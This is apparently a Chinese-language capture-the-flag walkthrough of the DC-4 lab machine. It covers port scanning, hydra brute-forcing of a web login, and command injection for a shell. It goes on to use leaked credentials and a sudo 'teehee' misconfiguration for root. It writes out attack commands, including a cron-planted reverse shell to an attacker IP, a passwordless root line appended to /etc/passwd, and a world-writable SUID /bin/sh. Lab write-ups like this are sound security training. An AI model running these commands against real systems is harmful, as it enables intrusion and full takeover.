DC-4
靶机链接
难度: beginners/intermediates
信息搜集
nmap -A -sV -p1-65535 -oN DC-4.txt 192.168.50.206
查看80端口,发现登陆界面,查看源码未发现任何有用信息。
漏洞挖掘与利用
使用cewl生成密码。
尝试使用hydra进行爆破。
hydra -L /share/username.txt -P /usr/share/wordlists/rockyou.txt 192.168.50.206 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
执行失败,尝试使用burp爆破模块进行爆破。
不知道为什么,全部成功了
登录一下试试
使用burp拦截数据包
发现空格使用+号进行替换,尝试修改数据包进行命令执行攻击。
使用pyhon获取交互式shell
python -c 'import pty;pty.spawn("/bin/sh")'
搜索文件后发现/home/jim/backups下存在old-password.bak
使用hydra进行爆破jim用户
jim:jibril04登陆后执行命令提示有新的邮件。
邮件说他要去度假,老板让他把密码给jim。
获取到用户名和密码
charles:^xHhA&hvim0y
su charles切换用户。
同样执行
find / -perm -u=s -type f 2>/dev/null
没有可以生成shell的可执行文件
使用sudo -l来查看用户的权限,发现有teehee命令是以root身份运行并不需要密码。
尝试运行teehee命令。
发现有用的参数:-a:追加内容到文件
使用命令创建个test用户权限为root。
sudo teehee -a /etc/passwd
anran::0:0:::/bin/bash
echo "administrator::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
administrator
一直验证失败
更换写入文件,往/etc/crontab里添加新的计划任务
echo "* * * * * root bash -i >& /dev/tcp/192.168.50.194/1234 0>&1" | sudo teehee -a /etc/crontab
需要在攻击方执行nc -lvvp 1234
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
等一分钟后执行/bin/dash
获取到权限后查看/etc/passwd文件检查为什么添加的用户无法登录
发现多了4行空行,应该是测试命令时写入的,删除后可以正常su提权到root权限了。